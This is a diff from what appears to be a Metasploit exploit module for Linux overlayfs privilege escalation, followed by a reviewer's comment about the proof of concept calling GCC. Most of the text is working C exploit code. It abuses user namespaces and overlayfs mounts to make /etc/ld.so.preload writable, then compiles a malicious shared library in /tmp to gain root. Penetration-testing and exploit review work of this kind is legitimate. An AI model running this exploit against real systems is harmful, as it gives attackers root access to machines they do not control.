modules/exploits/linux/local/overlayfs_priv_esc.rb

```diff
@@ -0,0 +1,458 @@
+          mkdir("/tmp/ns_sploit/upper",0777);
+          mkdir("/tmp/ns_sploit/o",0777);
+
+          fprintf(stderr,"mount #1\n");
+          if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/proc/sys/kernel,upperdir=/tmp/ns_sploit/upper") != 0) {
+      // workdir= and "overlay" is needed on newer kernels, also can't use /proc as lower
+              if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/sys/kernel/security/apparmor,upperdir=/tmp/ns_sploit/upper,workdir=/tmp/ns_sploit/work") != 0) {
+                  fprintf(stderr, "no FS_USERNS_MOUNT for overlayfs on this kernel\n");
+                  exit(-1);
+              }
+              file = ".access";
+              chmod("/tmp/ns_sploit/work/work",0777);
+          } else file = "ns_last_pid";
+
+          chdir("/tmp/ns_sploit/o");
+          rename(file,"ld.so.preload");
+
+          chdir("/");
+          umount("/tmp/ns_sploit/o");
+          fprintf(stderr,"mount #2\n");
+          if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc") != 0) {
+              if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc,workdir=/tmp/ns_sploit/work") != 0) {
+                  exit(-1);
+              }
+              chmod("/tmp/ns_sploit/work/work",0777);
+          }
+
+          chmod("/tmp/ns_sploit/o/ld.so.preload",0777);
+          umount("/tmp/ns_sploit/o");
+      }
+
+      int
+      main(int argc, char **argv)
+      {
+          int status, fd, lib;
+          pid_t wrapper, init;
+          int clone_flags = CLONE_NEWNS | SIGCHLD;
+
+          fprintf(stderr,"spawning threads\n");
+
+          if((wrapper = fork()) == 0) {
+              if(unshare(CLONE_NEWUSER) != 0)
+                  fprintf(stderr, "failed to create new user namespace\n");
+
+              if((init = fork()) == 0) {
+                  pid_t pid =
+                      clone(child_exec, child_stack + (1024*1024), clone_flags, NULL);
+                  if(pid < 0) {
+                      fprintf(stderr, "failed to create new mount namespace\n");
+                      exit(-1);
+                  }
+
+                  waitpid(pid, &status, 0);
+
+              }
+
+              waitpid(init, &status, 0);
+              return 0;
+          }
+
+          usleep(300000);
+
+          wait(NULL);
+
+          fprintf(stderr,"child threads done\n");
+
+          fd = open("/etc/ld.so.preload",O_WRONLY);
+
+          if(fd == -1) {
+              fprintf(stderr,"exploit failed\n");
+              exit(-1);
+          }
+
+          fprintf(stderr,"/etc/ld.so.preload created\n");
+          fprintf(stderr,"creating shared library\n");
+          lib = open("/tmp/ofs-lib.c",O_CREAT|O_WRONLY,0777);
+          write(lib,LIB,strlen(LIB));
+          close(lib);
+          lib = system("gcc -fPIC -shared -o /tmp/ofs-lib.so /tmp/ofs-lib.c -ldl -w");
```

Comment:
I'm fine with an option to compile (preferably a fallback), but the PoC indiscriminately shells out to GCC, and that is a problem.